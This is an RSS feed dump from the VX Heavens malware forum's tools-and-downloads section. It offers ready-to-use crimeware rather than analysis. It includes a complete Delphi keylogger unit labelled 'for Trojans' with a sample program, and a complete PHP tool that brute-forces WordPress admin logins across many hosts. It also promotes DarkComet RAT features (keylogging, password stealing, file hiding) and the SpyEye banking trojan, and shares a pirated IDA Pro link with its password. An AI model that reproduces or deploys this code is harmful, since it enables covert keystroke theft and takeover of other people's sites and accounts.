<![CDATA[VX Heavens forum - Tools and downloads]]> http://vx.netlux.org/forum/index.php Mon, 26 Dec 2011 18:36:24 +0000 PunBB <![CDATA[ShadowGhost3 source]]> http://vx.netlux.org/forum/viewtopic.php?id=1927&action=new this is an example of MBR rootkit.Enjoy it.

]]>
Mon, 26 Dec 2011 18:36:24 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1927&action=new
<![CDATA[Buster Sandbox Analyzer 1.48]]> http://vx.netlux.org/forum/viewtopic.php?id=1861&action=new Released Buster Sandbox Analyzer 1.48.

Changes:

+ Added PDF statistics feature
+ Added support for a new malware behaviour: get computer name
+ Updated LOG_API
+ Fixed several bugs

]]>
Mon, 26 Dec 2011 15:45:40 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1861&action=new
<![CDATA[ODbgScript_v1.79.3.0 for Immunity Debugger 1.80]]> http://vx.netlux.org/forum/viewtopic.php?id=1922&action=new I'd recommend Immunity Debugger just to practice while you are learning as it's very simple and useful.
Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.

A debugger with functionality designed specifically for the security industry
Cuts exploit development time by 50%
Simple, understandable interfaces
Robust and powerful scripting language for automating intelligent debugging
Lightweight and fast debugging to prevent corruption during complex analysis
Connectivity to fuzzers and exploit development tools.

THUMBS UP,IF YOU LIKE IT smile

]]>
Thu, 22 Dec 2011 04:19:49 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1922&action=new
<![CDATA[Code Virtualizer 1.3.1.0]]> http://vx.netlux.org/forum/viewtopic.php?id=1921&action=new Code Virtualizer

Code Virtualizer is a powerful code obfuscation system that helps developers protect their sensitive code areas against Reverse Engineering. Code Virtualizer has been designed to enact high security for your sensitive code while requiring minimal system resources.

Code Virtualizer will convert your original code into Virtual Opcodes that will be only understood by an internal Virtual Machine. Those Virtual Opcodes and the Virtual Machine itself are different for every protected application, avoiding a general attack over Code Virtualizer.

Code Virtualizer can protect your code in any x32 and x64 native PE files, like executable files (EXEs), system services, DLLs, OCXs, ActiveX controls, screen savers and device drivers.

This document explains the advantages of using Code Virtualizer and how to use it to protect your sensitive code against reverse engineering.


THUMBS UP,IF YOU LIKE IT smile

]]>
Thu, 22 Dec 2011 04:12:18 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1921&action=new
<![CDATA[DarkComet-RAT v4.0 Fix1 Released - Fully Cryptable]]> http://vx.netlux.org/forum/viewtopic.php?id=1512&action=new DarkComet-RAT v4.0 Change log
- DarkComet-RAT is now compiled on Delphi XE instead of Delphi 2010.
- Synthax highlighter added in remote keylogger.
- Multithreading is now more efficient, no more freezing, using a new powerfull and stable methode (still using pure Win32 API both side for it)
- Get hard drive information added in file manager
- Bot logs in main form had change, it is more efficient / fast and user friendly
- Whole system parser is now far stable and faster
- No-IP was moded and is now better wink
- All global settings were redisigned in a new form that will contain all necessary stuff for Client side
- Flags manager has been ported to the main client settings form
- Now you can change the default size Width and Height of the users thumbnails
- No more menu in the top of the SIN (Main Window - Users list...) so it is more clear
- The [+] button is one of the way to add a new port to listen else go to Socket/Net button to manage em all
- More options added in main tray icon (right click to display them)
- Skin system added in DarkComet in settings > Client Layount (for people that like templates - Most XP users)
- A new system of mass data saving had been added, sqlite local database system added (comet.db store all mass data) << don't delete this file ! - A complex and stable group manager been added in the users list (very strong) syncrhonized with the local database. - Now all users are stored and updated in local database - Webcam is now far more stable using now DirectX (DirectShow lib dumped from Microsoft by M.Braun) - As most crypters got the runPE function, it was removed in DarkComet then it is more easy to crypted for newbies - Little bug fixed in remote desktop - Mass downloader in control center was improved, a big bug was fixed - Keylogger GUI had change a little - New toast design - edit server now recognize encrypted profiles than normal ones. - few bugs in file listing fixed in file manager - New keylogger system, now all logs are divided by date [Months-Year] > [Day name] > full date file. so now it is more easy to find what you want to find.
- All logs are synchronized with the local database, that means if the remote gui delete the logs no problems it will be there synchronized with the DB smile
- Online keylogger is now separate from the offline one.
- last arrival logs (latest ones) will be display with a text icon and and eye on it.
- new rootkit function added in edit server (server shield) it hide the file from explorer even if show hidden files is on it will be also hidden from DIR command of MSDOS
- same rootkit function for parent dir
- Multipassword capture added, when you selected more than 1 users in the list and choose quick function password it will dump all selected users password.
- Wallpaper changer in file manager works fine now with .bmp and .jpg files for sure (not tested GIF) but PNG seems to not work.
- More components are double buffered now, so less blinking stuff on mouse move.
- List ports / services icons are better now
- UpNP exe drops now in temporary file then it wont anoy you and now it works all the time
- Save settings are better synchronized now (ini read/write)
- Now geoflag in users list aren't using the darkcomet-rat site database but a local GeoIP database then it is far more fast and stable. (do not delete GeoIP.dat !!)
- New search user system, very very strong and complete u will love it big_smile
- DC_UUID is now more perfmant using the computer HWID (Harware ID) + Default drive Serial (Like for my other software Vertex)
- Auto start desktop capture added in settings
- Auto start webcam capture added in settings
- Auto start sound capture added in settings
- A new super sexy about made don't forget to take a look to it wink
- Some notification added in file manager to know if actions was well done !
- new info added in computer info ( now the rat determine if remote computer id a laptop or desktop computer) if laptop it gives the battery charge status with icon smile
- Now you can preview any files in file manager by paquet of 1Ko then you don't need to download a 30Mo text file to see it smile
- A fantastic bookmark system for the file manager, like firefox when you click on the gray star it will turn to colors and add the current path to bookmarks and of course synchronized with local database big_smile
- Stub use less memory now, garbage colector is better now
- [ADDED] Miranda MSN Messenger password stealer
- Download thumnail (filemanager) bug fixed
- To avoid problems when you build many time a module to test edit server functions part by part when you build a module it will re generate a random mutex




Download : [Register or log in to view the URL]

]]>
Tue, 20 Dec 2011 19:39:21 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1512&action=new
<![CDATA[SpyEye 1.3.45 - Loader sourcecode]]> http://vx.netlux.org/forum/viewtopic.php?id=1373&action=new PunBB bbcode test

A new fresh and sophisticated web-based bot named SpyEye is around in the markets and looks like to be the possible successor of the famous Zeus Trojan due to its very interesting features, with the main objective to steal bank accounts, credit cards, ftp accounts and other sensitive data from the victim’s computer.

SpyEye was written in C++ and the size of the compiled binary is of 60 KB, the operating systems supported are from Windows 2000 to the recent Windows 7, it works in ring3 mode (same as Zeus Trojan).

It is sold as undetected from most Antivirus Software and it is invisible from the task managers and other user-mode applications, it hides the files from the regular explorer searches and it hides also its registry keys.

SpyEye is actually sold by its author at a price of approximately 500 $ USD for a base bundle, it is cheaper than the price of Zeus Trojan that is sold for more than 1,000 $ USD, but it looks like to have all the requirements, if not more, of the famous Zeus Trojan.


THUMBS UP,IF YOU LIKE IT ;-)

]]>
Mon, 19 Dec 2011 18:59:51 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1373&action=new
<![CDATA[Does anyone got a umm..]]> http://vx.netlux.org/forum/viewtopic.php?id=741&action=new fl.writeLine("text")

My virus is rediclous big 178 kb...

and i got to rewrite the entire script using

fl.writeLine("text")

one line at the time wich would take like FOREVER

can anyone create or adwise an application wich i can just copy the entire text into and it fl.writeLine("text") accordingly!! that would make me save a hell of alot time smile

]]>
Wed, 14 Dec 2011 20:47:22 +0000 http://vx.netlux.org/forum/viewtopic.php?id=741&action=new
<![CDATA[VsKeylogger]]> http://vx.netlux.org/forum/viewtopic.php?id=217&action=new this is Delphi unit to create a keylogger.

(* Keylogger Unit For Trojans
  Orginal Code By Veyskarami
 Iranian programmers for ever... *)
{$Warnings Off}
unit VsKeyLogger;
interface

uses Windows;
Function GetLoggedWindows():string;
Function GetLoggedKeys():string;
Function GetLoggedSize(Loggeds:String):integer;
Function SaveLogs(FileName,Strings: string):Boolean;
var
Loggeds:String;
Time:integer;
implementation
const
C1: array [1..26]  of Byte =($41,$42,$43,$44,$45,$46,$47,$48,$49,$4A,$4B,$4C,$4D,$4E,$4F,$50,$51,$52,$53,$54,$55,$56,$57,$58,$59,$5A);
//DX: array [27..52] of Byte =($61,$62,$63,$64,$65,$66,$67,$68,$69,$6A,$6B,$6C,$6D,$6E,$6F,$70,$71,$72,$73,$74,$75,$76,$77,$78,$79,$7A);
C2: array [53..62] of Byte =($30,$31,$32,$33,$34,$35,$36,$37,$38,$39);
C3: array [63..65] of Byte =($01,$02,$04);
CX: array [66..80] of Byte =($20,$21,$22,$23,$24,$25,$26,$27,$28,$2D,$2E,$08,$0D,$5B,$5C);
D1: array [81..104]of Byte =($7E,$2D,$3D,$5C,$5B,$5D,$3B,$27,$2C,$2E,$2F,$60,$3B,$7E,$5F,$2B,$7C,$7B,$7D,$3A,$22,$3C,$3E,$3F);
//D2: array [105..114] of Byte =($60,$61,$62,$63,$64,$65,$66,$67,$68,$69);
var
WNDCaption,OldCaption : array [0..255] of char;
(***********************************************)
function LowerCase(const S: string): string;
var I : Integer;
begin
  Result := S;
  for I := 1 to Length( S ) do
    if Result[ I ] in [ 'A'..'Z' ] then
  Inc( Result[ I ], 32 );
end;
function UpperCase(const S: string): string;
var I : Integer;
begin
  Result := S;
  for I := 1 to Length( S ) do
    if Result[ I ] in [ 'a'..'z' ] then
       Dec( Result[ I ], 32 );
end;
(***********************************************)
Function GetLoggedWindows():string;
begin
GetWindowText(GetForegroundWindow,WNDCaption,255);
if OldCaption <> WNDCaption then   if WNDCaption<>'' then
Result:='==========['+WNDCaption+']=========='+#13#10 else Result:='';
OldCaption :=WNDCaption;
end;

Function Caps():integer;
begin
if Odd(GetKeyState(VK_CAPITAL)) then
Result:=1 else
Result:=0;
end;

Function Shift():integer;
begin
if GetKeyState(VK_SHIFT) < 0 then
Shift := 1
else
Shift := 0;
end;

function Chrs():string;
var
U:integer;
begin
for U:=1 to 26 do if GetAsyncKeyState(C1[u])= -32767 then Result:=Chr(C1[u]);
end;

Function GetLoggedKeys():string;
var
A:integer;
begin
if Caps = 1 then
begin
if Shift = 1 then
begin
GetLoggedKeys := LowerCase(Chrs);
end
else
begin
GetLoggedKeys := UpperCase(Chrs);
end;
end
else
begin
if Shift = 1 then
begin
GetLoggedKeys := UpperCase(Chrs);
end
else
begin
GetLoggedKeys := LowerCase(Chrs);
end;
end;
for A:= 53 to 62 do if Shift=0 then
if GetAsyncKeyState(C2[A])= -32767  then Result:=Chr(C2[A]);
if Shift=0 then begin
if GetAsyncKeyState(VK_SUBTRACT)= -32767 then Result:=Chr(D1[95]);
if GetAsyncKeyState(189)= -32767 then Result:=Chr(D1[82]);
if GetAsyncKeyState(187)= -32767 then Result:=Chr(D1[83]);
if GetAsyncKeyState(188)= -32767 then Result:=Chr(D1[89]);
if GetAsyncKeyState(190)= -32767 then Result:=Chr(D1[90]);
if GetAsyncKeyState(191)= -32767 then Result:=Chr(D1[91]);
if GetAsyncKeyState(220)= -32767 then Result:=Chr(D1[84]);
if GetAsyncKeyState(221)= -32767 then Result:=Chr(D1[86]);
if GetAsyncKeyState(219)= -32767 then Result:=Chr(D1[85]);
if GetAsyncKeyState(222)= -32767 then Result:=Chr(D1[88]);
if GetAsyncKeyState(192)= -32767 then Result:=Chr(D1[92]);
if GetAsyncKeyState(186)= -32767 then Result:=Chr(D1[93]);
end;
if Shift=1 then begin
if GetAsyncKeyState(189)= -32767 then Result:=Chr(D1[95]);
if GetAsyncKeyState(187)= -32767 then Result:=Chr(D1[96]);
if GetAsyncKeyState(192)= -32767 then Result:=Chr(D1[94]);
if GetAsyncKeyState(188)= -32767 then Result:=Chr(D1[102]);
if GetAsyncKeyState(190)= -32767 then Result:=Chr(D1[103]);
if GetAsyncKeyState(191)= -32767 then Result:=Chr(D1[104]);
if GetAsyncKeyState(220)= -32767 then Result:=Chr(D1[97]);
if GetAsyncKeyState(221)= -32767 then Result:=Chr(D1[99]);
if GetAsyncKeyState(219)= -32767 then Result:=Chr(D1[98]);
if GetAsyncKeyState(222)= -32767 then Result:=Chr(D1[101]);
if GetAsyncKeyState(186)= -32767 then Result:=Chr(D1[100]);
end;
if Shift=1 then begin
if GetAsyncKeyState(C2[53])= -32767 then Result:=')';
if GetAsyncKeyState(C2[54])= -32767 then Result:='!';
if GetAsyncKeyState(C2[55])= -32767 then Result:='@';
if GetAsyncKeyState(C2[56])= -32767 then Result:='#';
if GetAsyncKeyState(C2[57])= -32767 then Result:='$';
if GetAsyncKeyState(C2[58])= -32767 then Result:='%';
if GetAsyncKeyState(C2[59])= -32767 then Result:='^';
if GetAsyncKeyState(C2[60])= -32767 then Result:='&';
if GetAsyncKeyState(C2[61])= -32767 then Result:='*';
if GetAsyncKeyState(C2[62])= -32767 then Result:='(';
end;
if GetAsyncKeyState(C3[63])= -32767 then Result:='[Left Mouse]';
if GetAsyncKeyState(C3[64])= -32767 then Result:='[Rigth Mouse]';
if GetAsyncKeyState(C3[65])= -32767 then Result:='[Middle Mouse]';
if GetAsyncKeyState(CX[66])= -32767 then Result:='[Space]';
if GetAsyncKeyState(CX[67])= -32767 then Result:='[Page Up]';
if GetAsyncKeyState(CX[68])= -32767 then Result:='[Page Down]';
if GetAsyncKeyState(CX[69])= -32767 then Result:='[End]';
if GetAsyncKeyState(CX[70])= -32767 then Result:='[Home]';
if GetAsyncKeyState(CX[71])= -32767 then Result:='[Left]';
if GetAsyncKeyState(CX[72])= -32767 then Result:='[Up]';
if GetAsyncKeyState(CX[73])= -32767 then Result:='[Rigth]';
if GetAsyncKeyState(CX[74])= -32767 then Result:='[Down]';
if GetAsyncKeyState(CX[75])= -32767 then Result:='[Insert]';
if GetAsyncKeyState(CX[76])= -32767 then Result:='[Delete]';
if GetAsyncKeyState(CX[77])= -32767 then Result:='[BackSpace]';
if GetAsyncKeyState(CX[78])= -32767 then Result:='[Enter]';
if GetAsyncKeyState(CX[79])= -32767 then Result:='[LeftWin]';
if GetAsyncKeyState(CX[80])= -32767 then Result:='[RigthWin]';
if GetAsyncKeyState(96)= -32767 then Result:='0';
if GetAsyncKeyState(97)= -32767 then Result:='1';
if GetAsyncKeyState(98)= -32767 then Result:='2';
if GetAsyncKeyState(99)= -32767 then Result:='3';
if GetAsyncKeyState(100)= -32767 then Result:='4';
if GetAsyncKeyState(101)= -32767 then Result:='5';
if GetAsyncKeyState(102)= -32767 then Result:='6';
if GetAsyncKeyState(103)= -32767 then Result:='7';
if GetAsyncKeyState(104)= -32767 then Result:='8';
if GetAsyncKeyState(105)= -32767 then Result:='9';
if GetAsyncKeyState(250)= -32767 then Result:='PLAY';
end;

Function SaveLogs(FileName,Strings: string):Boolean;
var
   BatchFile: TextFile;
   BatchFileName: string;
begin
   BatchFileName:=FileName;
   SetFileAttributes(Pchar(FileName),FILE_ATTRIBUTE_NORMAL);
   AssignFile(BatchFile,BatchFileName);
   Rewrite(BatchFile);
   Writeln(BatchFile,Strings);
   CloseFile(BatchFile);
   Loggeds:='';
   Time:=0;
end;

Function GetLoggedSize(Loggeds:String):integer;
begin
    Result:=Length(Loggeds);
end;

end.


Sample

(* Keylogger Unit For Trojans
  Orginal Code By Veyskarami
 Iranian programmers for ever... *)
{$Warnings Off}
program Sample;

uses
  Windows,KeyLogger;

var
Msg:TMsg;
Handle:hwnd;

Procedure Main;
begin
Loggeds:=Loggeds+GetLoggedWindows+GetLoggedKeys;
(* Save By Size *)
if GetLoggedSize(Loggeds) > 500 then SaveLogs ('Log.txt',Loggeds);
(* Save By Time
Time:=Time+1;
if Time:=10000 then SaveLogs ('Log.txt',Loggeds);
*)
end;

begin
Handle:=CreateWindow( '', '',WS_DISABLED, 0,0,0,0, 0,0,0,nil);
SetTimer(Handle,0,1,@Main);
while(GetMessage(Msg,Handle,0,0))do
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
end.
]]>
Wed, 14 Dec 2011 20:43:30 +0000 http://vx.netlux.org/forum/viewtopic.php?id=217&action=new
<![CDATA[Hex-Rays IDA Pro 6.1-UNiQUE]]> http://vx.netlux.org/forum/viewtopic.php?id=1162&action=new http://img138.imageshack.us/img138/2456/idapro.gif

[Register or log in to view the URL]

Password:
w4r3zh4ck

]]>
Wed, 14 Dec 2011 19:47:48 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1162&action=new
<![CDATA[Decoding malware SSL using Burp proxy]]> http://vx.netlux.org/forum/viewtopic.php?id=1869&action=new [Register or log in to view the URL]

]]>
Tue, 13 Dec 2011 12:23:11 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1869&action=new
<![CDATA[Cain & Abel v4.9.43]]> http://vx.netlux.org/forum/viewtopic.php?id=1868&action=new Cain & Abel is a password recovery tool for Microsoft operating systems.

It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using dictionary and brute force attacks, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Info + download

[Register or log in to view the URL]

]]>
Tue, 13 Dec 2011 12:12:49 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1868&action=new
<![CDATA[online compiler]]> http://vx.netlux.org/forum/viewtopic.php?id=1634&action=new [Register or log in to view the URL]

- UNIX GCC C/C++ (*.c, *.cpp) source code for Windows to full executable file (*.exe)
  - GCC C/C++ for Windows (*.c, *.cpp)
  - Borland C++ (*.cpp)
  - Perl script (*.pl)
  - Borland Delphi application (*.dpr)

  Debug mode is always on.

  working on: support Python, Framework,  multi files to compile and special options.


l/p : gosc/gosc

]]>
Mon, 12 Dec 2011 19:24:54 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1634&action=new
<![CDATA[What is Windows Defender Offline Beta?]]> http://vx.netlux.org/forum/viewtopic.php?id=1852&action=new Sometimes, malicious and other potentially unwanted software, including rootkits, try to install themselves on your PC. This can happen when you connect to the Internet or install some programs from a CD, DVD, or other media. Once on your PC, this software might run immediately, or it might run at unexpected times. Windows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it's important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks.

To use Windows Defender Offline Beta, you need to follow four basic steps:

Download Windows Defender Offline Beta and create a CD, DVD, or USB flash drive.

Restart your PC using the Windows Defender Offline Beta media.

Scan your PC for malicious and other potentially unwanted software.

Remove any malware that is found from your PC.

Windows Defender Offline Beta will walk you through the details of these four steps when you're using the tool. If you've been prompted in Microsoft Security Essentials or Windows Defender to download and run Windows Defender Offline Beta, it's important that you do so, to make sure that your data and your PC isn't compromised.

To get started, find a blank CD, DVD, or USB flash drive with at least 250 MB of free space and then download and run the tool—the tool will help you create the removable media.

[Register or log in to view the URL]

]]>
Thu, 08 Dec 2011 08:41:29 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1852&action=new
<![CDATA[HoneySpider Network Capture-HPC NG is out!]]> http://vx.netlux.org/forum/viewtopic.php?id=1845&action=new Client honeypots are tools that actively search servers for malicious data like malware, exploits, malicious PDF files, etc.

The Polish Chapter just released a new version of Capture-HPC originally developed by Christian Seifert and Ramon Steenson of the New Zealand Chapter. Capture-HPC focuses primarily on attacks against, or involving the use of, Web browsers.

It is available for download as binary Debian package on Polish Chapter webpage:
[Register or log in to view the URL]

]]>
Wed, 07 Dec 2011 16:26:00 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1845&action=new
<![CDATA[WordPress admin panel bruteforce]]> http://vx.netlux.org/forum/viewtopic.php?id=1840&action=new USAGE:
    the first text area is for all websites you wanna check out it’s security.
    the second text area is for the usernames you wanna check out.
    the third text area is for passwords you wanna check.
    then click brute now, and you will get the results synchronously!


<?php
echo "
<!--
Powered By Coderz
www.c0derz.com
Wordpress Admin Panel Penetration Testing
V 1
PS: this tool is for penetration testing and educational purpose, c0derz.com is not responsible at any bad using for this tool.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
-->
";

error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);
?>
<html>
<head>
<title>C0derz.com | WordPress Admin Panel Penetration Testing</title>
<meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>

<style type="text/css">
body {
    color: white;
    background-image: url(http://c0derz.com/wp-content/themes/Polished/images/background.png);
}
textarea {
    border-radius: 8px;
    color: white;
    background-color:black;
}
input[type=submit] , .submit{
        background-color:black;
        color:white;
        border-radius:8px;
}
p {
    font-size: 10px;
    text-align: center;
}
a:link,a:hover,a:visited {
    color:white;
}
</style>
</head>
<!-- C0derz.com | WordPress Admin Panel Penetration Testing -->
<center>
<p><a href="http://www.c0derz.com" target="_blank"><img src="http://c0derz.com/wp-content/themes/Polished/images/logo.png" border="0"/></a></p>
<form enctype="multipart/form-data" method="POST">
  <table width='624' border='0' id='Box'>
    <tr>
<td width='4%'>&nbsp;</td>
<td width="96%" colspan="3" align="center" ><p>C0derz.com | WordPress Admin Panel Penetration Testing </p></td>
</tr>
    <tr>
      <td >&nbsp;</td>
      <td ><p>Hosts:</p></td>
      <td ><p> Users:</p></td>
      <td ><p>Passwords:</p></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
      <td ><textarea name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
      <td ><textarea name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
    </tr>
<tr><td colspan="4"><input type="submit" name="submit" value="Brute Now" class="submit"  />
<?php
if($_POST)
{
    $hosts = trim(filter($_POST['hosts']));
    $passwords = trim(filter($_POST['passwords']));
    $usernames = trim(filter($_POST['usernames']));

    if($passwords && $usernames && $hosts)
    {
        $hosts_explode = explode("\n", $hosts);
        $usernames_explode = explode("\n", $usernames);
        $passwords_explode = explode("\n", $passwords);

        foreach($hosts_explode as $host)
        {
            $host = RemoveLastSlash($host);
            $hacked = 0;
            $host = str_replace(array("http://","https://","www."),"",trim($host));
            $host = "http://".$host;
            $wpAdmin = $host.'/wp-admin/';

            if(!url_exists($host."/wp-login.php"))
            {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;}

            foreach($usernames_explode as $username)
            {
                foreach($passwords_explode as $password)
                {
                    $ch   =     curl_init();
                    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
                    curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
                    curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
                    curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
                    curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
                    curl_setopt($ch,CURLOPT_POST,TRUE);
                    curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#38;#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");
                    $login    =       curl_exec($ch);

                    if(eregi ("profile.php",$login) )
                    {
                        $hacked = 1;
                        echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
                        ob_flush();flush();break;
                    }
                }
                if($hacked == 1){break;}
            }
            if($hacked == 0)
            {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
        }
    }
    else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
}
?>
</td></tr>
</table></form>

<!-- C0derz.com | WordPress Admin Panel Penetration Testing -->
<p>powered by <a href="http://c0derz.com">c0derz.com</a></p>
</center>
<p>
  <?php
function url_exists($strURL)
{
    $resURL = curl_init();
    curl_setopt($resURL, CURLOPT_URL, $strURL);
    curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
    curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
    curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
    curl_exec ($resURL);
    $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
    curl_close ($resURL);
    if ($intReturnCode != 200){return false;}
    else{return true ;}
}
function filter($string)
{
    if(get_magic_quotes_gpc() != 0){return stripslashes($string);    }
    else{return $string;    }
}
function RemoveLastSlash($host)
{
    if(strrpos($host, '/', -1) == strlen($host)-1)
    {return substr($host,0,strrpos($host, '/', -1));}
    else{return $host;}
}
?>
<?php  echo "</p>"; ?>

    Journalisée
]]>
Mon, 05 Dec 2011 04:06:20 +0000 http://vx.netlux.org/forum/viewtopic.php?id=1840&action=new